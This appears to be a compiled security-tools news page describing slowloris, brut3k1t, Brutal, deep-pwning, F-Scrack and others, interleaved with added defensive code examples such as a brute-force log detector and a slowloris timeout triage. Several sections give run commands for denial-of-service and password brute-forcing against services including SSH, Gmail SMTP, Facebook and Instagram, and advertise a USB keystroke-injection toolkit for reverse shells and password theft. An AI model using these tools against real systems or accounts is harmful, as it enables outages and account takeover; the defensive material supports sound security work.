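The CAUTION about the second nibble is the IEEE address-format rule: the first octet's lowest bit is the I/G (multicast) bit and the next bit is the U/L (locally administered) bit, and a software-assigned unicast address must have U/L set and I/G clear, which leaves exactly the digits 2, 6, A and E. The checker below is an added example, not part of WinMACSpoofer; it derives that set from the bit rule instead of hard-coding it and classifies addresses accordingly, which is also how an auditor can tell a vendor-assigned address from a locally set one in an inventory or ARP table.

```python
import re
from typing import List

MAC_RE = re.compile(r"^([0-9A-Fa-f]{2})(?:[:-][0-9A-Fa-f]{2}){5}$")


def allowed_second_nibbles() -> List[str]:
    """Second hex digits whose U/L bit (bit 1) is set and I/G bit (bit 0) is clear."""
    return [f"{n:X}" for n in range(16) if n & 0b11 == 0b10]


def first_octet(mac: str) -> int:
    """Return the first octet of a colon- or dash-separated MAC, rejecting malformed input."""
    m = MAC_RE.match(mac)
    if not m:
        raise ValueError(f"not a MAC address: {mac!r}")
    return int(m.group(1), 16)


def classify(mac: str) -> str:
    """Classify by the two low bits of the first octet."""
    octet = first_octet(mac)
    if octet & 0x01:
        return "multicast"
    return "locally-administered unicast" if octet & 0x02 else "globally-unique unicast"


def is_locally_administered_unicast(mac: str) -> bool:
    """True for addresses the spoofing tool's rule would accept."""
    return classify(mac) == "locally-administered unicast"


if __name__ == "__main__":
    print("allowed second nibbles:", allowed_second_nibbles())
    for sample in ("02-11-22-33-44-55", "AC:BC:32:B4:33:23", "01:00:5E:00:00:FB", "0A:00:27:00:00:00"):
        print(sample, "->", classify(sample))
```

Two of the sample addresses come from the myLG `disc` output earlier on this page: the Apple NIC is globally unique, and the vboxnet0 address `0a:00:27:...` is locally administered, as virtual adapters usually are.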


Acunetix v11 - Web Application Security Testing Tool

London, UK – November 2016 – Acunetix, the pioneer in automated web application security software, has announced the release of version 11. New integrated vulnerability management features extend the enterprise’s ability to comprehensively manage, prioritise and control vulnerability threats – ordered by business criticality. Version 11 includes a new web-based UI for greater ease-of-use and manageability, providing access by multiple users.
For the first time in the marketplace Acunetix is launching an enterprise-level product that integrates sophisticated automated testing technology with vulnerability management, at a price point accessible to every development team. Chris Martin, CEO, Acunetix explains:
“Acunetix has for the past 12 years been at the forefront in web application security with its cutting-edge vulnerability scanning technology. With version 11 we have combined proactive scanning for web application vulnerabilities with the prioritization of mitigation activities. This integration helps security teams gain the intelligence they need to work more efficiently, prioritizing actions, assigning jobs and therefore reducing costs.”
The new web-based interface significantly improves the manageability of the Acunetix on-premises solution, making it easy for less seasoned security personnel to check the vulnerabilities within the company’s web assets. In addition, user privileges can be automatically assigned.
Nicholas Sciberras, CTO, Acunetix, comments: “Version 11 helps organizations engaged heavily in application development by utilising a role-based multi-user system.”

Inbuilt Vulnerability Management

New integrated vulnerability management features allow for the review of aggregated vulnerability data across all Targets, prioritizing security risks and therefore providing a clear view of the business’ security posture, while facilitating compliance.
New inbuilt vulnerability management features include:
  • All Targets (web applications to scan) are now stored in Acunetix with their individual settings and can be easily re-scanned.
  • Targets are displayed in one interface and classified by business criticality, allowing you to easily focus on the most important assets.
  • Vulnerabilities can also be prioritized by the Target’s business criticality.
  • Consolidated reports are stored in the central interface.
  • Users can choose between “Target reports”, “Scan reports” or “All Vulnerabilities” report.

Web-based user interface

The user interface has been re-engineered from the ground up for greater usability and manageability. The minimalist design focuses on the most widely used and important features, doing away with extras which cluttered the screen. Since the interface is now web-based, multiple users can access it from their browser irrespective of the OS used.


Role-based multi-user system

Acunetix version 11 allows the creation of multiple user accounts, which can be assigned a particular group of targets. Depending on the privileges assigned to the user, the user can create, scan, and report on the targets assigned to them. This is particularly important for large enterprises, which require multiple users to help secure their assets.


Standard, Pro and Enterprise Editions

Acunetix version 11 will be available in three main editions: Standard, Pro and Enterprise.
Standard Edition: the entry level, ideal for small organisations and single workstation users. The Standard Edition offers the same level of vulnerability detection provided in the Pro and Enterprise Editions and includes Developer, Executive Summary and OWASP Top 10 reports.
Pro Edition: allows outsourced or insourced security professionals to group and classify asset targets. It integrates with Software Development Life Cycle (SDLC) project management or bug tracking systems, includes comprehensive compliance reports, and integrates with top Web Application Firewalls (WAFs).
Enterprise Edition: includes full multi-user team support and has the ability to deploy multiple scan engines managed by the central system. The Enterprise Edition will be able to scale from 3 to unlimited users and up to 50 Acunetix scan engines.


Download Acunetix v11

slowloris - Low bandwidth DoS tool


Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this:
  1. We start making lots of HTTP requests.
  2. We send headers periodically (every ~15 seconds) to keep the connections open.
  3. We never close the connection unless the server does so. If the server closes a connection, we create a new one and keep doing the same thing.
This exhausts the server's thread pool and the server can't reply to other people.
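The three steps above explain why the usual per-connection idle timeout does not help: each connection receives a header line every ~15 seconds, so it never looks idle. What does help is a total deadline for receiving the complete request headers, measured from when the connection was opened, plus a cap on half-open requests per client. The triage below is an added example written for this page, not part of slowloris or its repository; the connection table is constructed, and the deadline and per-peer limit are assumed values.

```python
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Conn:
    peer: str               # client address
    opened_at: float        # seconds on a monotonic clock
    last_byte_at: float     # last time any request byte arrived
    headers_complete: bool  # has the blank line that ends the header block been seen?


# Constructed connection table as seen at time NOW; not taken from a real server.
NOW = 100.0
CONNS = [
    Conn("203.0.113.5", 10.0, 95.0, False),   # open for 90 s, one header line every ~15 s, never finishes
    Conn("203.0.113.5", 12.0, 96.0, False),
    Conn("203.0.113.5", 14.0, 97.0, False),
    Conn("198.51.100.9", 98.0, 99.0, False),  # ordinary client that connected 2 s ago
    Conn("198.51.100.9", 60.0, 99.5, True),   # keep-alive connection whose request is complete
]


def idle_timeout_victims(conns: List[Conn], now: float, idle_s: float = 30.0) -> List[Conn]:
    """What a plain per-connection idle timeout would close: nothing, if bytes keep trickling in."""
    return [c for c in conns if now - c.last_byte_at > idle_s]


def header_deadline_victims(conns: List[Conn], now: float, deadline_s: float = 20.0) -> List[Conn]:
    """What a total header-read deadline, measured from connection open, would close."""
    return [c for c in conns if not c.headers_complete and now - c.opened_at > deadline_s]


def pending_per_peer(conns: List[Conn]) -> Counter:
    """Number of connections per client that still have not finished sending headers."""
    return Counter(c.peer for c in conns if not c.headers_complete)


def triage(conns: List[Conn], now: float, deadline_s: float = 20.0, max_pending: int = 2) -> Dict:
    """Connections to close now, and peers holding more half-open requests than allowed."""
    pending = pending_per_peer(conns)
    return {
        "close": header_deadline_victims(conns, now, deadline_s),
        "suspicious_peers": sorted(p for p, n in pending.items() if n > max_pending),
    }


if __name__ == "__main__":
    print("idle timeout would close:", len(idle_timeout_victims(CONNS, NOW)))
    result = triage(CONNS, NOW)
    print("header deadline closes:", len(result["close"]), "suspicious:", result["suspicious_peers"])
```

The same two controls exist in production servers: Apache's mod_reqtimeout (`RequestReadTimeout header=...`) and nginx's `client_header_timeout` bound the time to receive the headers, and per-client connection limits bound the half-open count.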

How to install and run?
You can clone the git repo or install using pip. Here's how you run it.
  • sudo pip3 install slowloris
  • slowloris example.com
That's all it takes to install and run slowloris.py.
If you want to clone using git instead of pip, here's how you do it.
  • git clone https://github.com/gkbrk/slowloris.git
  • cd slowloris
  • python3 slowloris.py example.com

Configuration options
It is possible to modify the behaviour of slowloris with command-line arguments.


brut3k1t - Server-side Brute-force Module (ssh, ftp, smtp, facebook, and more)


Server-side brute-force module: a brute-force (strictly speaking, dictionary) attack tool that supports multiple protocols and services.

1. Introduction
brut3k1t is a server-side bruteforce module that supports dictionary attacks for several protocols. The protocols currently complete and supported are:
  • ssh
  • ftp
  • smtp
  • XMPP
  • instagram
  • facebook
There will be future implementations of different protocols and services (including Twitter, Facebook, Instagram).

2. Installation
Installation is simple. brut3k1t requires several dependencies, although the program will install them if you do not have them.
  • argparse - utilized for parsing command line arguments
  • paramiko - utilized for working with SSH connections and authentication
  • ftplib - utilized for working with FTP connections and authentication
  • smtplib - utilized for working with SMTP (email) connections and authentication
  • fbchat - utilized for connecting with Facebook
  • selenium - utilized for web scraping, which is used with Instagram (and later Twitter)
  • xmppy - utilized for XMPP connections ...and more within the future!
Downloading is simple. Simply git clone:
git clone https://github.com/ex0dus-0x/brut3k1t
Change to directory:
cd /path/to/brut3k1t

3. Usage
Utilizing brut3k1t is a little more complicated than just running a Python file.
Typing python brut3k1t -h shows the help menu:
usage: brut3k1t.py [-h] [-s SERVICE] [-u USERNAME] [-w PASSWORD] [-a ADDRESS]
                   [-p PORT] [-d DELAY]

Server-side bruteforce module written in Python

optional arguments:
  -h, --help            show this help message and exit
  -a ADDRESS, --address ADDRESS
                        Provide host address for specified service. Required
                        for certain protocols
  -p PORT, --port PORT  Provide port for host address for specified service.
                        If not specified, will be automatically set
  -d DELAY, --delay DELAY
                        Provide the number of seconds the program delays as
                        each password is tried

required arguments:
  -s SERVICE, --service SERVICE
                        Provide a service being attacked. Several protocols
                        and services are supported
  -u USERNAME, --username USERNAME
                        Provide a valid username for service/protocol being
                        executed
  -w PASSWORD, --wordlist PASSWORD
                        Provide a wordlist or directory to a wordlist

Examples of usage:
Cracking an SSH server running on 192.168.1.3 with the user root and wordlist.txt as the wordlist:
python brut3k1t.py -s ssh -a 192.168.1.3 -u root -w wordlist.txt
The program will automatically set the port to 22; if it is different, specify it with the -p flag.
Cracking the email account test@gmail.com with wordlist.txt on port 25 and a 3 second delay. For email you must use the SMTP server's address, e.g. for Gmail it is smtp.gmail.com; you can research this using Google.
python brut3k1t.py -s smtp -a smtp.gmail.com -u test@gmail.com -w wordlist.txt -p 25 -d 3
Cracking the XMPP account test@creep.im with wordlist.txt on the default port 5222. XMPP is similar to SMTP in that you need to provide the address of the XMPP server, in this case creep.im.
python brut3k1t.py -s xmpp -a creep.im -u test -w wordlist.txt
Cracking Facebook is quite a challenge, since you will require the target user ID, not the username.
python brut3k1t.py -s facebook -u 1234567890 -w wordlist.txt
Cracking Instagram with the username test, the wordlist wordlist.txt and a 5 second delay:
python brut3k1t.py -s instagram -u test -w wordlist.txt -d 5
Key Notes to Remember
  • If you do not supply the port -p flag, the default port for that service will be used. You do not need to provide it for Facebook and Instagram, since they are web-based.
  • If you do not supply the delay -d flag, the default delay in seconds will be 1.
  • Remember, use the SMTP server address and XMPP server address for the address -a flag, when cracking SMTP and XMPP, respectively.
  • Facebook requires the username ID. This is a little bit of a setback since some people do not display their ID publicly on their profile.
  • Make sure the wordlist and its directory is specified. If it is in /usr/local/wordlists/wordlist.txt specify that for the wordlist -w flag.
  • Remember that some protocols are not based on their default port. An FTP server will not necessarily always be on port 21. Please keep that in mind.
  • Use this for educational and ethical hacking purposes, as well as the sake of learning code and security-oriented practices. No script kiddies!
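Seen from the server being attacked, a dictionary attack at the default 1 second delay is a steady stream of authentication failures from one source, and the dangerous case is a success arriving right after such a burst. The detector below is an added example written for this page, not part of brut3k1t; it parses sshd log lines in syslog format (a constructed sample, with the year supplied because syslog omits it), keeps a sliding window of failures per source address, and raises one alert when a source crosses the failure threshold and another when that source then logs in successfully. The threshold and window values are assumptions to tune per environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, Iterable, List, Optional

# Constructed sshd log lines (not from a real host). syslog timestamps carry no year.
AUTH_LOG = """\
Nov  7 10:00:01 bastion sshd[2001]: Failed password for root from 203.0.113.7 port 51000 ssh2
Nov  7 10:00:02 bastion sshd[2002]: Failed password for root from 203.0.113.7 port 51001 ssh2
Nov  7 10:00:03 bastion sshd[2003]: Failed password for invalid user admin from 203.0.113.7 port 51002 ssh2
Nov  7 10:00:04 bastion sshd[2004]: Failed password for root from 203.0.113.7 port 51003 ssh2
Nov  7 10:00:05 bastion sshd[2005]: Failed password for root from 203.0.113.7 port 51004 ssh2
Nov  7 10:00:06 bastion sshd[2006]: Accepted password for root from 203.0.113.7 port 51005 ssh2
Nov  7 10:00:30 bastion sshd[2007]: Failed password for alice from 198.51.100.4 port 40000 ssh2
Nov  7 10:00:40 bastion sshd[2008]: Accepted publickey for alice from 198.51.100.4 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse_line(line: str, year: int = 2016) -> Optional[Dict]:
    """Extract result, auth method, user and source from one sshd line; None if it is not an auth event."""
    m = LINE_RE.match(line)
    if not m:
        return None
    stamp = " ".join(m["ts"].split())  # collapse the double space in "Nov  7"
    ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"], "user": m["user"], "src": m["src"]}


def detect_bruteforce(lines: Iterable[str], threshold: int = 5, window_s: int = 60) -> List[Dict]:
    """Sliding-window failure count per source; alert on a burst and on a login that follows one."""
    recent = defaultdict(deque)  # src -> failure timestamps inside the window
    flagged = set()
    alerts: List[Dict] = []
    for ev in filter(None, map(parse_line, lines)):
        q = recent[ev["src"]]
        while q and (ev["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            if len(q) >= threshold and ev["src"] not in flagged:
                flagged.add(ev["src"])
                alerts.append({"kind": "failure_burst", "src": ev["src"], "failures": len(q), "at": ev["ts"]})
        elif len(q) >= threshold:  # success while the window is still full of failures
            alerts.append({"kind": "success_after_burst", "src": ev["src"], "user": ev["user"],
                           "method": ev["method"], "at": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(AUTH_LOG.splitlines()):
        print(alert)
```

A single failure from the second source is never reported, and a key-based login that follows no failures is ignored; the second alert kind is the one worth paging on, because it marks a password that was actually guessed.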


deep-pwning - Metasploit for Machine Learning


Deep-pwning is a lightweight framework for experimenting with machine learning models with the goal of evaluating their robustness against a motivated adversary.
Note that deep-pwning in its current state is nowhere close to maturity or completion. It is meant to be experimented with, expanded upon, and extended by you. Only then can we help it truly become the go-to penetration testing toolkit for statistical machine learning models.

Background
Researchers have found that it is surprisingly trivial to trick a machine learning model (classifier, clusterer, regressor etc.) into making an objectively wrong decision. This field of research is called Adversarial Machine Learning. It is not hyperbole to claim that any motivated attacker can bypass any machine learning system, given enough information and time. However, this issue is often overlooked when architects and engineers design and build machine learning systems. The consequences are worrying when these systems are put into use in critical scenarios, such as in the medical, transportation, financial, or security-related fields.
Hence, when one is evaluating the efficacy of applications using machine learning, their malleability in an adversarial setting should be measured alongside the system's precision and recall.
This tool was released at DEF CON 24 in Las Vegas, August 2016, during a talk titled Machine Duping 101: Pwning Deep Learning Systems .

Structure
This framework is built on top of Tensorflow, and many of the included examples in this repository are modified Tensorflow examples obtained from the Tensorflow GitHub repository.
All of the included examples and code implement deep neural networks, but they can be used to generate adversarial images for similarly tasked classifiers that are not implemented with deep neural networks. This is because of the phenomenon of 'transferability' in machine learning, which Papernot et al. expound upon expertly in this paper. It means that adversarial samples crafted with a DNN model A may be able to fool another, distinctly structured DNN model B, as well as some other SVM model C.
This figure taken from the aforementioned paper (Papernot et al.) shows the percentage of successful adversarial misclassification for a source model (used to generate the adversarial sample) on a target model (upon which the adversarial sample is tested).


Components
Deep-pwning is modularized into several components to minimize code repetition. Because of the vastly different nature of potential classification tasks, the current iteration of the code is optimized for classifying images and phrases (using word vectors).
These are the code modules that make up the current iteration of Deep-pwning:
  1. Drivers
    The drivers are the main execution point of the code. This is where you can tie the different modules and components together, and where you can inject more customizations into the adversarial generation processes.
  2. Models
    This is where the actual machine learning model implementations are located. For example, the provided lenet5 model definition is located in the model() function within lenet5.py. It defines the network as the following:
    -> Input
    -> Convolutional Layer 1
    -> Max Pooling Layer 1
    -> Convolutional Layer 2
    -> Max Pooling Layer 2
    -> Dropout Layer
    -> Softmax Layer
    -> Output

    LeCun et al. LeNet-5 Convolutional Neural Network
  3. Adversarial (advgen)
    This module contains the code that generates adversarial output for the models. The run() function defined in each of these advgen classes takes an input_dict that contains several predefined tensor operations for the machine learning model defined in Tensorflow. If the model that you are generating the adversarial sample for is known, the variables in the input dict should be based on that model definition. Otherwise, if the model is unknown (black-box generation), a substitute model should be used or implemented, and that model's definition should be used. Variables that need to be passed in are the input tensor placeholder variables and labels (often referred to as x -> input and y_ -> labels), the model output (often referred to as y_conv), and the actual test data and labels that the adversarial images will be based on.
  4. Config
    Application configurations.
  5. Utils
    Miscellaneous utilities that don't belong anywhere else. These include helper functions to read data, deal with Tensorflow queue inputs etc.
These are the resource directories relevant to the application:
  1. Checkpoints
    Tensorflow allows you to load a partially trained model to resume training, or load a fully trained model into the application for evaluation or performing other operations. All these saved 'checkpoints' are stored in this resource directory.
  2. Data
    This directory stores all the input data in whatever format that the driver application takes in.
  3. Output
    This is the output directory for all application output, including adversarial images that are generated.
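
Because the transferability paragraph above and the advgen description are easier to follow with a concrete run, here is an added example (my own code, not deep-pwning's and not Tensorflow) in pure Python: a logistic-regression 'source' model supplies input gradients, a fast-gradient-sign step perturbs constructed 2-D test points, and the perturbed points are then scored against both the source model and a nearest-centroid 'target' model that was never consulted during crafting. The names LogReg, NearestCentroid, fgsm_perturb and run_experiment, the toy data and the epsilon value are this example's own assumptions.

```python
"""Added example (not deep-pwning code): craft gradient-sign adversarial
samples against a 'source' model and test whether they transfer to a
differently structured 'target' model.  The data is constructed and the
class/function names are this example's own."""
import math
import random


def make_dataset(n, seed, margin=0.2):
    """Constructed 2-D data: label 1 if x0 + x1 > 0, else 0.  Points closer
    than `margin` to the true boundary are skipped so the task is separable."""
    rng = random.Random(seed)
    xs, ys = [], []
    while len(xs) < n:
        x = (rng.uniform(-1, 1), rng.uniform(-1, 1))
        s = x[0] + x[1]
        if abs(s) < margin:
            continue
        xs.append(x)
        ys.append(1 if s > 0 else 0)
    return xs, ys


def sigmoid(z):
    if z >= 0:
        return 1.0 / (1.0 + math.exp(-z))
    e = math.exp(z)  # numerically stable branch for large negative logits
    return e / (1.0 + e)


class LogReg:
    """Binary logistic regression trained by SGD: the model whose input
    gradients are used for crafting (the known model, or the substitute
    model in the black-box setting the text describes)."""

    def __init__(self, xs, ys, seed, epochs=50, lr=0.1):
        rng = random.Random(seed)
        self.w = [rng.uniform(-0.1, 0.1), rng.uniform(-0.1, 0.1)]
        self.b = 0.0
        for _ in range(epochs):
            for x, y in zip(xs, ys):
                g = sigmoid(self.logit(x)) - y  # d(cross-entropy)/d(logit)
                self.w[0] -= lr * g * x[0]
                self.w[1] -= lr * g * x[1]
                self.b -= lr * g

    def logit(self, x):
        return self.w[0] * x[0] + self.w[1] * x[1] + self.b

    def predict(self, x):
        return 1 if self.logit(x) > 0 else 0

    def input_gradient(self, x, y):
        """Gradient of the loss with respect to the *input* (what an advgen
        module obtains from the Tensorflow graph via tf.gradients)."""
        p = min(max(sigmoid(self.logit(x)), 1e-12), 1 - 1e-12)
        return ((p - y) * self.w[0], (p - y) * self.w[1])


class NearestCentroid:
    """A differently structured 'target' model (class-mean classifier)."""

    def __init__(self, xs, ys):
        self.c = {}
        for label in (0, 1):
            pts = [x for x, y in zip(xs, ys) if y == label]
            self.c[label] = (sum(p[0] for p in pts) / len(pts),
                             sum(p[1] for p in pts) / len(pts))

    def predict(self, x):
        d = {k: (x[0] - c[0]) ** 2 + (x[1] - c[1]) ** 2 for k, c in self.c.items()}
        return 1 if d[1] < d[0] else 0


def sign(v):
    return (v > 0) - (v < 0)


def fgsm_perturb(model, x, y, eps):
    """Fast gradient sign step: move every input coordinate by eps in the
    direction that increases the source model's loss."""
    g = model.input_gradient(x, y)
    return (x[0] + eps * sign(g[0]), x[1] + eps * sign(g[1]))


def accuracy(model, xs, ys):
    return sum(model.predict(x) == y for x, y in zip(xs, ys)) / len(xs)


def run_experiment(eps=0.5, seed=1):
    """Clean and adversarial accuracy for the source and the target model."""
    train_x, train_y = make_dataset(200, seed)
    test_x, test_y = make_dataset(300, seed + 1)
    source = LogReg(train_x, train_y, seed)
    target = NearestCentroid(train_x, train_y)
    adv_x = [fgsm_perturb(source, x, y, eps) for x, y in zip(test_x, test_y)]
    return {
        "source_clean": accuracy(source, test_x, test_y),
        "source_adv": accuracy(source, adv_x, test_y),
        "target_clean": accuracy(target, test_x, test_y),
        "target_adv": accuracy(target, adv_x, test_y),  # transferred samples
    }


if __name__ == "__main__":
    for name, value in run_experiment().items():
        print(f"{name}: {value:.2f}")
```

Run it and the clean accuracy of both models stays high while accuracy on the perturbed points drops for the target model as well as the source, which is the transferability effect the text describes and the reason the framework lets you substitute a model when the real one is unknown. In a Tensorflow advgen module the input_gradient step corresponds to differentiating the loss built from y_conv and y_ with respect to the placeholder x.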

Getting Started

Installation
Please follow the directions to install tensorflow found here https://www.tensorflow.org/versions/r0.8/get_started/os_setup.html which will allow you to pick the tensorflow binary to install.
$ pip install -r requirements.txt

Execution Example (with the MNIST driver)
To restore from a previously trained checkpoint (configuration in config/mnist.conf):
$ cd dpwn
$ python mnist_driver.py --restore_checkpoint
To train from scratch (note that any previous checkpoint(s) located in the folder specified in the configuration will be overwritten):
$ cd dpwn
$ python mnist_driver.py

Task list
  • Implement saliency graph method of generating adversarial samples
  • Add defense module to the project for examples of some defenses proposed in literature
  • Upgrade to Tensorflow 0.9.0
  • Add support for using pretrained word2vec model in sentiment driver
  • Add SVM & Logistic Regression support in models (+ example that uses them)
  • Add non-image and non-phrase classifier example
  • Add multi-GPU training support for faster training speeds

Requirements
Note that dpwn requires Tensorflow 0.8.0. Tensorflow 0.9.0 introduces some

Contributing
(borrowed from the amazing Requests repository by kennethreitz)
  • Check for open issues or open a fresh issue to start a discussion around a feature idea or a bug.
  • Fork the repository on GitHub to start making your changes to the master branch (or branch off of it).
  • Write a test which shows that the bug was fixed or that the feature works as expected.
  • Send a pull request and bug the maintainer until it gets merged and published. :) Make sure to add yourself to AUTHORS.md .

Acknowledgements
There is so much impressive work from so many machine learning and security researchers that directly or indirectly contributed to this project and inspired this framework. This is an incomplete list of resources that were used or referenced in one way or another:

Papers

Code

Datasets


httpstat - Curl Statistics Made Simple


httpstat visualizes curl(1) statistics in a beautiful and clear way.
It is a single-file Python script that has no dependencies and is compatible with Python 3.

Installation
There are three ways to get httpstat :
  • Download the script directly: wget https://raw.githubusercontent.com/reorx/httpstat/master/httpstat.py
  • Through pip: pip install httpstat
  • Through homebrew (macOS only): brew install httpstat

Usage
Simply:
python httpstat.py httpbin.org/get
If installed through pip or brew, you can use httpstat as a command:
httpstat httpbin.org/get

cURL Options
Because httpstat is a wrapper of cURL, you can pass any cURL-supported option after the URL (except for -w, -D, -o, -s, -S, which are already used by httpstat):
httpstat httpbin.org/post -X POST --data-urlencode "a=b" -v
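
As an added example (my own code, not httpstat's), the following shows what the wrapper does with those reserved options: it runs curl with -w to emit timing variables, -D - to dump the headers to stdout, and -o/-s/-S for the body and quiet mode, then splits the output and computes the per-phase durations. The curl -w variable names are real curl variables; the sample curl output is constructed so the parsing and arithmetic run offline.

```python
"""Added example, not httpstat's own code: build the curl invocation that
httpstat wraps and turn curl's -w timing variables into a phase breakdown.
The %{time_*} names are real curl -w variables; SAMPLE_STDOUT is constructed."""
import json

# curl expands each %{...} into a floating-point number of seconds
WRITE_OUT_TEMPLATE = (
    '{"time_namelookup": %{time_namelookup}, "time_connect": %{time_connect}, '
    '"time_appconnect": %{time_appconnect}, "time_pretransfer": %{time_pretransfer}, '
    '"time_starttransfer": %{time_starttransfer}, "time_total": %{time_total}}'
)

# Constructed stdout of such a curl run: dumped headers, blank line, timing JSON
SAMPLE_STDOUT = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json\r\n"
    "Content-Length: 42\r\n"
    "\r\n"
    '{"time_namelookup": 0.012, "time_connect": 0.030, "time_appconnect": 0.085, '
    '"time_pretransfer": 0.086, "time_starttransfer": 0.210, "time_total": 0.230}'
)


def curl_command(url, extra_args=()):
    """argv for curl.  -w, -D, -o, -s and -S are the options the page says
    httpstat reserves; any user-supplied options are appended after the URL."""
    return ["curl", "-w", WRITE_OUT_TEMPLATE, "-D", "-", "-o", "/dev/null",
            "-s", "-S", url, *extra_args]


def parse_curl_output(stdout):
    """Split curl's stdout into the status line, a header dict and the timing
    JSON that -w appends after the dumped headers."""
    lines = stdout.rstrip("\n").split("\n")
    timings = {k: float(v) for k, v in json.loads(lines[-1]).items()}
    status_line = lines[0].strip()
    headers = {}
    for line in lines[1:-1]:
        if ":" in line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return status_line, headers, timings


def phases(t):
    """Phase durations in milliseconds.  time_appconnect is 0 for plain HTTP,
    in which case there is no TLS handshake phase."""
    tls_done = t["time_appconnect"] if t["time_appconnect"] > 0 else t["time_connect"]
    return {
        "dns_lookup": round(t["time_namelookup"] * 1000),
        "tcp_connection": round((t["time_connect"] - t["time_namelookup"]) * 1000),
        "tls_handshake": round((tls_done - t["time_connect"]) * 1000),
        "server_processing": round((t["time_starttransfer"] - t["time_pretransfer"]) * 1000),
        "content_transfer": round((t["time_total"] - t["time_starttransfer"]) * 1000),
    }


if __name__ == "__main__":
    import subprocess
    import sys

    if len(sys.argv) > 1:  # live run: python this.py https://example.org/
        out = subprocess.run(curl_command(sys.argv[1]), capture_output=True,
                             text=True, check=True).stdout
    else:                  # offline demo on the constructed sample
        out = SAMPLE_STDOUT
    status, headers, timings = parse_curl_output(out)
    print(status, headers, phases(timings))
```

The server_processing figure is the gap between the request being sent (time_pretransfer) and the first response byte (time_starttransfer), which is the number to look at when a backend, rather than the network or TLS, is slow.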

Environment Variables
httpstat has a bunch of environment variables to control its behavior. Here are some usage demos; you can also run httpstat --help to see the full explanation.
  • HTTPSTAT_SHOW_BODY
  • HTTPSTAT_SHOW_IP
  • HTTPSTAT_SHOW_SPEED
  • HTTPSTAT_SAVE_BODY
  • HTTPSTAT_CURL_BIN
  • HTTPSTAT_DEBUG
    Set to true to see debugging logs. Default is false.

For convenience, you can export these environment variables in your .zshrc or .bashrc, for example:
export HTTPSTAT_SHOW_IP=false
export HTTPSTAT_SHOW_SPEED=true
export HTTPSTAT_SAVE_BODY=false

Related Projects
Here are some implementations in various languages:
Some code blocks in httpstat are copied from other projects of mine, have a look:



Brutal - Toolkit to quickly create various Payload, PowerShell Attack, Virus Attack and Launch Listener for a HID


Brutal is extremely useful for executing scripts on a target machine without the need for human-to-keyboard interaction (HID attack). When you insert the device, it is detected as a keyboard, and using the microprocessor and onboard flash memory storage it can send a very fast set of keystrokes to the target's machine and completely compromise it, regardless of autorun. I've used it in my security testing to run recon or enumeration scripts, execute reverse shells, exploit local DLL hijack/privilege escalation vulnerabilities, and get all passwords. Now I'm developing a new tool named Brutal.

So what is Brutal?
Brutal is a toolkit to quickly create various payloads, PowerShell attacks and virus attacks, and to launch a listener for a Human Interface Device.

Screenshot



Video
  • Do you want a Mr. Robot-style hacking scene, like when Angela Moss plugs a USB into a computer to get credential information? You can choose that payload in Brutal (option 3 or 4).

The Goal
  • Generate various payloads and PowerShell attacks without coding
  • To help break into computers very fast and agile :p
  • Payload compatibility: targets Windows machines only

Requirements
  • Arduino Software ( I used v1.6.7 )
  • TeensyDuino
  • Linux udev rules
  • How to install all requirements? Visit this wiki

Supported Hardware
The following hardware has been tested and is known to work.
  • Teensy 3.x
  • USB cable

Getting Started
  1. Copy and paste the PaensyLib folder into your Arduino\libraries folder
  2. git clone https://github.com/Screetsec/Brutal.git
  3. cd Brutal
  4. chmod +x Brutal.sh
  5. sudo ./Brutal.sh or sudo su ./Brutal.sh

Credits

Metasploitable3 - An Intentionally Vulnerable Machine for Exploit Testing



Metasploitable3 is a VM that is built from the ground up with a large number of security vulnerabilities. It is intended to be used as a target for testing exploits with Metasploit.
Metasploitable3 is released under a BSD-style license. See COPYING for more details.

Building Metasploitable 3
System Requirements:
  • OS capable of running all of the required applications listed below
  • VT-x/AMD-V Supported Processor recommended
  • 65 GB Available space on drive
  • 2.5 GB RAM
Requirements:
NOTE: A bug was recently discovered in VirtualBox 5.1.8 that is breaking provisioning. More information here.
NOTE: A bug was recently discovered in Vagrant 1.8.7 on OSX that is breaking provisioning. More information here.
To build automatically:
  1. Run the build_win2008.sh script if using bash, or build_win2008.ps1 if using Windows.
  2. If the command completes successfully, run 'vagrant up'.
  3. When this process completes, you should be able to open the VM within VirtualBox and login. The default credentials are U: vagrant and P: vagrant.
To build manually:
  1. Clone this repo and navigate to the main directory.
  2. Build the base VM image by running packer build windows_2008_r2.json. This will take a while the first time you run it since it has to download the OS installation ISO.
  3. After the base Vagrant box is created you need to add it to your Vagrant environment. This can be done with the command vagrant box add windows_2008_r2_virtualbox.box --name=metasploitable3.
  4. Use vagrant plugin install vagrant-reload to install the reload Vagrant provisioner if you haven't already.
  5. To start the VM, run the command vagrant up. This will start up the VM and run all of the installation and configuration scripts necessary to set everything up. This takes about 10 minutes.
  6. Once this process completes, you can open up the VM within VirtualBox and login. The default credentials are U: vagrant and P: vagrant.

Vulnerabilities

More Information
The wiki has a lot more detail and serves as the main source of documentation. Please check it out .

Acknowledgements
The Windows portion of this project was based off of GitHub user joefitzgerald's packer-windows project. The Packer templates, original Vagrantfile, and installation answer files were used as the base template and built upon for the needs of this project.


F-Scrack - A Single File Bruteforcer Supports Multi-Protocol


F-Scrack is a single-file brute-forcer that supports multiple protocols and requires no libraries beyond the Python standard library, which makes it ideal for a quick test.

Currently supported protocols: FTP, MySQL, MSSQL, MongoDB, Redis, Telnet, Elasticsearch, PostgreSQL.

Compatible with OSX, Linux, Windows, Python 2.6+.

Usage
Options:
python F-Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10]

-h  Target(s): a single IP (192.168.1.1), an IP range (192.168.1, or 192.168.1.1-192.168.1.254), or an IP list file (ip.ini); maximum 65535 IPs per scan.
